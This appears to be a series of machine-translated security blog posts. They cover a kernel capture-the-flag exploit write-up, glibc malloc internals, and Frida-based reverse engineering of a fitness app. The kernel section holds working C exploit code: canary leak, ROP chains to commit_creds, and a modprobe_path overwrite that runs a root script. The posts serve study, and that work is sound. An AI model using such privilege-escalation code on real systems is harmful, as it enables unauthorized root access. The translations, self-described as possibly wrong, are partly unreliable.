swapgs_restore_regs_and_return_to_usermode = addr;
printf("\033[33m\033[1m[√] Found swapgs_restore_regs_and_return_to_usermode: %lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode);
}
}

offset = swapgs_restore_regs_and_return_to_usermode - 0xa008da - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Method 0x2 - __ksymtab

Next, let's assume we cannot obtain the addresses of commit_creds and prepare_kernel_cred from their (randomized) sections. Going by the implementation of FGKASLR, we can use readelf --section-headers -W vmlinux | grep -vE 'ax' to see which sections do not get an additional shift. Among them is a __ksymtab section: each entry stores the offset from the entry's own address to the symbol, and the section's offset from the kernel base is fixed.
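For reference, on kernels built with CONFIG_HAVE_ARCH_PREL32_RELOCATIONS a ksymtab entry looks roughly like the sketch below (not the authoritative definition; check include/linux/export.h of the target kernel, and note the namespace field only exists on newer kernels). The symbol address is recovered by adding the 4-byte value_offset to the address of the entry itself:

/* Rough sketch of a position-relative ksymtab entry. */
struct kernel_symbol {
    int value_offset;       /* symbol address minus the address of this field */
    int name_offset;
    int namespace_offset;   /* newer kernels only */
};

/* The recovery the ROP chain performs, expressed in C: */
static unsigned long ksym_addr(const int *entry) {
    /* entry points at __ksymtab_<sym>; its first int is value_offset */
    return (unsigned long)entry + *entry;   /* e.g. commit_creds from &__ksymtab_commit_creds */
}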

We can achieve this using similar gadgets:

pop rax; ret;
__ksymtab_commit_creds - 0x10;
mov rax, [rax + 0x10];
pop rdi; ret;
__ksymtab_commit_creds;
add rdi, rax;
; RDI is commit_creds now

However, for this particular challenge I found that the vmlinux stores direct addresses rather than offsets, and each ksymtab entry holds only two ints instead of the expected three; I am not sure whether this is an IDA issue or something else. The vmlinux.stripped recovered with vmlinux-to-elf does not contain this symbol either, so this approach is shelved for now.

Method 0x3 - modprobe_path

The third approach exploits modprobe_path, a kernel variable located in the .data section. When the kernel is asked to execute a file with an unknown magic header, the do_execve() path eventually reaches call_modprobe(), which runs the program pointed to by modprobe_path with root privileges. Thus, we only need to overwrite modprobe_path.

First, obtain the address of modprobe_path. I could not find it in the symbol table, but you can locate it by searching memory directly for the string "/sbin/modprobe". After returning to user mode, create a malicious "modprobe" script, for example one that drops a suid shell. In practice the root context it runs in does not seem to get a useful PATH environment variable, so it may be simpler to just copy the flag out.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RAX_RET 0xffffffff810520cf
#define MOV_PTR_RBX_RAX_POP_RBX_RET 0xffffffff8101e5e1
#define POP_RBX_RET 0xffffffff81000472
#define MODPROBE_PATH 0xffffffff8223d8c0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a008f0

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t swapgs_restore_regs_and_return_to_usermode;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getFlag() {
puts("\033[33m\033[01m[+] Ready to get flag!!!\033[0m");
system("echo '#!/bin/sh\ncp /root/flag /tmp/flag\nchmod 777 /tmp/flag' > /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/nova");
system("chmod +x /tmp/nova");

puts("\033[33m\033[01m[+] Run /tmp/nova\033[0m");
system("/tmp/nova");

system("cat /tmp/flag");
exit(0);
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {

if (!swapgs_restore_regs_and_return_to_usermode && strcmp(name, "swapgs_restore_regs_and_return_to_usermode") == 0) {
swapgs_restore_regs_and_return_to_usermode = addr;
printf("\033[33m\033[1m[√] Found swapgs_restore_regs_and_return_to_usermode: %lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode);
break;
}

}

offset = swapgs_restore_regs_and_return_to_usermode - 0xa008da - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] base: 0x%lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode-0xa008da);
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RBX_RET + offset;
rop[i++] = MODPROBE_PATH + offset;
rop[i++] = POP_RAX_RET + offset;
rop[i++] = *(size_t *) "/tmp/x";
rop[i++] = MOV_PTR_RBX_RAX_POP_RBX_RET + offset;
rop[i++] = *(size_t *) "muElnova";
rop[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + offset;
rop[i++] = *(size_t *) "muElnova";
rop[i++] = *(size_t *) "muElnova";
rop[i++] = (size_t) getFlag;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

References

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

Kernel Pwn ROP bypass KPTI - Wings' Blog (wingszeng.top)

info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

「Kernel」Following the Linux Kernel Lab Lightly


Before We Begin

In this article, we will follow along with Linux Kernel Teaching, progressing from basic to advanced kernel studies, to prepare for potential future kernel development work.

It's worth noting that this course also has a Chinese version, and you can support their efforts by starring the repository at linux-kernel-labs-zh/docs-linux-kernel-labs-zh-cn.

In subsequent blog posts, I may simply summarize the course content, as copying existing material without adding my own insights would be pointless. Our focus will be on the experimental sections.

An In-depth Analysis of malloc and Its Exploitable Points


Consolidate the fastbins before moving on to the small bins. It may seem excessive to clear all fastbins before even checking whether space is available, but it avoids the fragmentation problems usually associated with fastbins. Besides, in practice programs tend to issue runs of either small or large requests rather than a mix of both, so consolidation is not needed often in most programs; programs that do trigger it frequently tend to fragment anyway.

The next part of the code will then fetch from the large bin.

Fragment Consolidation

    malloc_consolidate (av);

malloc_consolidate()

Defined in malloc.c at #4704

/*
------------------------- malloc_consolidate -------------------------

malloc_consolidate is a specialized version of free() that tears
down chunks held in fastbins. Free itself cannot be used for this
purpose since, among other things, it might place chunks back onto
fastbins. So, instead, we need to use a minor variant of the same
code.
*/

static void malloc_consolidate(mstate av)
{
mfastbinptr* fb; /* current fastbin being consolidated */
mfastbinptr* maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;

atomic_store_relaxed (&av->have_fastchunks, false);

unsorted_bin = unsorted_chunks(av);

/*
Remove each chunk from fast bin and consolidate it, placing it
then in unsorted bin. Among other reasons for doing this,
placing in unsorted bin avoids needing to calculate actual bins
until malloc is sure that chunks aren't immediately going to be
reused anyway.
*/
/* Loop starting from the first chunk, consolidate all chunks */
maxfb = &fastbin (av, NFASTBINS - 1);
fb = &fastbin (av, 0);
do {
p = atomic_exchange_acq (fb, NULL);
if (p != 0) {
do {
{
if (__glibc_unlikely (misaligned_chunk (p))) // Pointers must be aligned
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");

unsigned int idx = fastbin_index (chunksize (p));
if ((&fastbin (av, idx)) != fb) // Fastbin chunk check
malloc_printerr ("malloc_consolidate(): invalid chunk size");
}

check_inuse_chunk(av, p);
nextp = REVEAL_PTR (p->fd);

/* Slightly streamlined version of consolidation code in free() */
size = chunksize (p);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
/* Check if prevsize and size are equal */
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size in fastbins");
unlink_chunk (av, p); // Unlink the prev chunk
}

if (nextchunk != av->top) {
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

if (!nextinuse) {
size += nextsize;
unlink_chunk (av, nextchunk);
} else
clear_inuse_bit_at_offset(nextchunk, 0);

/* Insert p at the head of a linked list */
first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

if (!in_smallbin_range (size)) {
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}
// next chunk = av -> top, consolidate to topchunk
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

} while ( (p = nextp) != 0);

}
} while (fb++ != maxfb);
}

Firstly, set the PREV_INUSE of the next adjacent chunk to 1. If the previous adjacent chunk is free, merge it. Then check if the next chunk is free and merge if needed. Regardless of whether the merge is complete or not, place the fastbin or the bin after consolidation into the unsorted_bin. (If adjacent to the top chunk, merge it with the top chunk)
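As a quick illustration of when this code runs, here is a minimal user-space sketch (assuming glibc 2.31 with default tuning; the sizes are chosen only so the later frees bypass tcache): a largebin-sized request finds have_fastchunks set, calls malloc_consolidate(), and the two adjacent fastbin chunks end up merged into one chunk in the unsorted bin.

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *p[9];

    /* 0x30-sized chunks: fill the 7-slot tcache bin first so the last two
     * frees actually reach the fastbin. */
    for (int i = 0; i < 9; i++)
        p[i] = malloc(0x28);
    void *barrier = malloc(0x18);        /* keeps p[8] away from the top chunk */

    for (int i = 0; i < 7; i++)
        free(p[i]);                      /* -> tcache */
    free(p[7]);                          /* -> fastbin */
    free(p[8]);                          /* -> fastbin */

    /* A largebin-range request triggers malloc_consolidate(): p[7] and p[8]
     * are adjacent, so they get merged and parked in the unsorted bin. */
    void *big = malloc(0x500);

    printf("big = %p (fastbins consolidated before this allocation)\n", big);
    (void)barrier;
    return 0;
}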

Iteration

So long that my head is spinning...

/*
Process recently freed or remaindered chunks, taking one only if
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.

The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request.
*/

#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
tcache_nb = nb;
int return_cached = 0; // Flag indicating that the appropriately sized chunk has been put into tcache

tcache_unsorted_count = 0; // Number of processed unsorted chunks

Loop through the unsorted bin and place each chunk into its corresponding bin:

  for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) // Have all unsorted chunks been retrieved
{
bck = victim->bk;
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size);
// Some safety checks
if (__glibc_unlikely (size <= CHUNK_HDR_SZ)
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/


if (in_smallbin_range (nb) && // Within the small bin range
bck == unsorted_chunks (av) && // Only one chunk in unsorted_bin
victim == av->last_remainder && // Is the last remainder
(unsigned long) (size) > (unsigned long) (nb + MINSIZE)) // If size is greater than nb + MINSIZE, i.e., chunk can still be a chunk after `nb` memory is taken
{
/* split and reattach remainder */
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb); // Remaining remainder
unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; // Reconstruct unsorted_bin linked list
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks (av);
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0)); // Flag for nb
set_head (remainder, remainder_size | PREV_INUSE); // Flag for remainder
set_foot (remainder, remainder_size);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p; // Return nb
}

// More checks...
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");

// Retrieve the head chunk
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

/* Take now instead of binning if exact fit */

if (size == nb)
{
// Set the flag
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
// Put victim into tcache instead of returning
// Since in most cases, a size that has just been needed has a higher probability of continuance, it is put into tcache
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

/* place chunk in bin */

if (in_smallbin_range (size)) // Place into small bin
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck) // If large bin is not empty
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE; // Set PREV_INUSE to 1
/* if smaller than smallest, bypass loop below */
assert (chunk_main_arena (bck->bk));
/* Insert directly at the end of the large bin */
if ((unsigned long) (size)
< (unsigned long) chunksize_nomask (bck->bk))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert (chunk_main_arena (fwd));
/* Find the first chunk that is not greater than `victim` */
while ((unsigned long) size < chunksize_nomask (fwd))
{
fwd = fwd->fd_nextsize;
assert (chunk_main_arena (fwd));
}

if ((unsigned long) size
== (unsigned long) chunksize_nomask (fwd))
/* If the size is the same, insert it after `fwd`, without adding nextsize to reduce computation */
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
/* Insert it before `fwd`, adding nextsize */
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
}
else // If large bin is empty
victim->fd_nextsize = victim->bk_nextsize = victim;
}

// Insert into the linked list
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
// If tcache is full, get chunk from tcache
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}

#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
// After the while loop, get chunk from tcache
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif

If no chunk of the right size was found while processing the unsorted bin, the following code searches the sorted bins for a suitable chunk:

       /*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/

if (!in_smallbin_range (nb))
{
bin = bin_at (av, idx);

/* skip scan if empty or largest chunk is too small */
// If large bin is non-empty and the size of the first chunk >= nb
if ((victim = first (bin)) != bin
&& (unsigned long) chunksize_nomask (victim)
>= (unsigned long) (nb))
{
// Find the first chunk with size >= nb
victim = victim->bk_nextsize;
while (((unsigned long) (size = chunksize (victim)) <
(unsigned long) (nb)))
victim = victim->bk_nextsize;

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
// If `victim` is not the last one and `victim->fd` has the same size as `victim`, take the next one, since it is not maintained by the nextsize links
if (victim != last (bin)
&& chunksize_nomask (victim)
== chunksize_nomask (victim->fd))
victim = victim->fd;

remainder_size = size - nb;
unlink_chunk (av, victim); // Retrieve victim

/* Exhaust */
// If remaining is less than the minimum chunk, discard it
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
}
/* Split */
// Otherwise, split it into the unsorted_bin
else
{
remainder = chunk_at_offset (victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
malloc_printerr ("malloc(): corrupted unsorted chunks");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
}
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/
This part is a bit confusing: av->binmap records which bins are non-empty, with a bin's bit set to 1 when it still holds free chunks and 0 otherwise.

for (;; )
{
/* Skip rest of block if there are no more set bits in this block. */
/* If bit > map, it means that the free chunks in this block's bin are all smaller than the required chunk. Skip the loop directly. */
if (bit > map || bit == 0)
{
do
{
// If there are no available blocks, then use the top chunk directly
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
}
while ((map = av->binmap[block]) == 0); // This block has no free chunks

// Find the first bin of the current block
bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
}

/* Advance to bin with set bit. There must be one. */
// When the current bin is not available, search for the next bin
while ((bit & map) == 0)
{
bin = next_bin(bin);
bit <<= 1; // Use the next chunk
assert(bit != 0);
}

/* Inspect the bin. It is likely to be non-empty */
// Start from the smallest chunk
victim = last(bin);

/* If a false alarm (empty bin), clear the bit. */
// If the bin is empty, update the value of binmap and find the next bin
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}

else
{
// If not empty, extract the chunk and perform splitting and merging
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
// The first chunk (the largest one) is large enough
assert((unsigned long)(size) >= (unsigned long)(nb));

remainder_size = size - nb;

/* Unlink */
unlink_chunk(av, victim);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}

/* Split */
else
{
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
malloc_printerr("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}
use_top:
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by the current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if (__glibc_unlikely(size > av->system_mem))
malloc_printerr("malloc(): corrupted top size");
// If the top chunk can be independent after splitting nb
if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
// If it is not enough to split and there are still fastbins, merge the fastbins
else if (atomic_load_relaxed(&av->have_fastchunks))
{
malloc_consolidate(av);
/* Restore the original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
// Otherwise, call sysmalloc to request memory from the operating system
else
{
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}
}
info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

MiBand-8-Pro-Data-to-Obsidian


Recently, I set up a life management system with the help of DIYGOD. With various plugins, I achieved semi-automation. However, manually recording sleep time, steps, and other data like heart rate and blood pressure is not very geeky. After some research, I found out that Zepp (formerly Huami) has a reverse-engineered API interface that stores step count and other information in plaintext. This led me to impulsively purchase the Xiaomi Mi Band 8 Pro Genshin Impact Limited Edition. To my surprise, I discovered that the Xiaomi Mi Band 8 no longer supports Zepp. Although the Xiaomi Mi Band 7 does not officially support Zepp, it can still be used by modifying the QR code and using the Zepp installation package. However, the Xiaomi Mi Band 8 has completely deprecated Zepp.

Initial Exploration — Packet Capture

Firstly, I attempted to capture packets to see if there was any useful information available. I used to use Proxifier for packet capture, but it was not very effective due to some software having SSLPinning. This time, I utilized mitmproxy along with a system-level certificate.

Tools Used

Testing Method

In a nutshell, I installed mitmproxy on my PC, obtained the mitmproxy-ca-cert.cer file in the $HOME/.mitmproxy directory, and installed it on the Android device as per the normal workflow.

I then installed ConscryptTrustUserCerts in Magisk and restarted the device; during boot it mounts the user-level certificates into the system-level certificate directory. That completed the preparation.

After opening mitmweb on the PC, setting the Wi-Fi proxy on the phone to <my-pc-ip>:8080, I successfully captured HTTPS requests.

Conclusion

It was not very useful. All requests were encrypted, and there were signatures, hashes, nonces, etc., to ensure security. I did not want to reverse engineer the apk, so I abandoned this approach.

Glimpse of Hope — BLE Connection

Since packet capturing was not feasible, I decided to write a BLE client that connects to the band and retrieves the data, which seemed like a very reasonable approach. Moreover, this method requires no action on the phone: a script run from Obsidian could connect once, pull the data, and the whole thing would be nicely automated.

Implementation

The code mainly referenced wuhan005/mebeats: 💓 Real-time heart rate data collection for Xiaomi Mi Bands. However, as his tools were for MacOS, I made some modifications with the help of GPT.

// Java code block translated to English
public final void bindDeviceToServer(lg1 lg1Var) {
    Logger.i(getTAG(), "bindDeviceToServer start");
    HuaMiInternalApiCaller huaMiDevice = HuaMiDeviceTool.Companion.getInstance().getHuaMiDevice(this.mac);
    if (huaMiDevice == null) {
        String tag = getTAG();
        Logger.i(tag + "bindDeviceToServer huaMiDevice == null", new Object[0]);
        if (lg1Var != null) {
            lg1Var.onConnectFailure(4);
        }
    } else if (needCheckLockRegion() && isParallel(huaMiDevice)) {
        unbindHuaMiDevice(huaMiDevice, lg1Var);
    } else {
        DeviceInfoExt deviceInfo = huaMiDevice.getDeviceInfo();
        if (deviceInfo == null) {
            String tag2 = getTAG();
            Logger.i(tag2 + "bindDeviceToServer deviceInfo == null", new Object[0]);
            return;
        }
        String sn = deviceInfo.getSn();
        setMDid("huami." + sn);
        setSn(deviceInfo.getSn());
        BindRequestData create = BindRequestData.Companion.create(deviceInfo.getSn(), this.mac, deviceInfo.getDeviceId(), deviceInfo.getDeviceType(), deviceInfo.getDeviceSource(), deviceInfo.getAuthKey(), deviceInfo.getFirmwareVersion(), deviceInfo.getSoftwareVersion(), deviceInfo.getSystemVersion(), deviceInfo.getSystemModel(), deviceInfo.getHardwareVersion());
        String tag3 = getTAG();
        Logger.d(tag3 + create, new Object[0]);
        getMHuaMiRequest().bindDevice(create, new HuaMiDeviceBinder$bindDeviceToServer$1(this, lg1Var), new HuaMiDeviceBinder$bindDeviceToServer$2(lg1Var, this));
    }
}

By examining this function, we can see that the data is retrieved from deviceInfo, which is obtained from huaMiDevice. For those interested, the details of how this is derived can be explored in the package com.xiaomi.wearable.wear.connection.

The Ultimate Solution — Frida Hook

At this point, I had already decided on the final approach - reverse engineering. Since the data sent out is encrypted, there must be a process where unencrypted data handling occurs. By reverse engineering it, hooking into it, and writing an Xposed module to monitor it, the task could be accomplished.

Due to time constraints, I will not delve into how to install Frida.

Initially, I used jadx-gui with its "copy as frida snippet" feature, which saved a lot of effort. However, due to various peculiarities of Kotlin data classes, the necessary information often could not be obtained this way. Since I did not document the troubleshooting as I went, here is a brief overview:

  1. Initially, I observed the fitness_summary database in the /data/data/com.mi.health/databases folder, which contains the desired data. Cross-referencing led me to the com.xiaomi.fit.fitness.persist.db.internal class.
  2. Exploring methods such as update and insert, I found com.xiaomi.fit.fitness.persist.db.internal.h.getDailyRecord, which produced output on every refresh but only contained fields such as sid and time, not the actual values.
  3. Continuing along that trail, I used the following snippet to inspect the overloads and parameter types.
var insertMethodOverloads = hClass.updateAll.overloads;

for (var i = 0; i < insertMethodOverloads.length; i++) {
var overload = insertMethodOverloads[i];
console.log("Overload #" + i + " has " + overload.argumentTypes.length + " arguments.");
for (var j = 0; j < overload.argumentTypes.length; j++) {
console.log(" - Argument " + j + ": " + overload.argumentTypes[j].className);
}
}
  4. It struck me that exceptions could be utilized to examine the function call stack - a breakthrough moment.
var callerMethodName = Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new());
console.log("getTheOneDailyRecord called by: " + callerMethodName);
  5. Proceeding layer by layer, I discovered the class com.xiaomi.fit.fitness.export.data.aggregation.DailyBasicReport, which perfectly met my needs.
    dbutilsClass.getAllDailyRecord.overload('com.xiaomi.fit.fitness.export.data.annotation.HomeDataType', 'java.lang.String', 'long', 'long', 'int').implementation = function (homeDataType, str, j, j2, i) {
console.log("getAllDailyRecord called with args: " + homeDataType + ", " + str + ", " + j + ", " + j2 + ", " + i);
var result = this.getAllDailyRecord(homeDataType, str, j, j2, i);
var entrySet = result.entrySet();
var iterator = entrySet.iterator();
while (iterator.hasNext()) {
var entry = iterator.next();
console.log("entry: " + entry);
}
var callerMethodName = Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new());
console.log("getTheOneDailyRecord called by: " + callerMethodName);
return result;
}

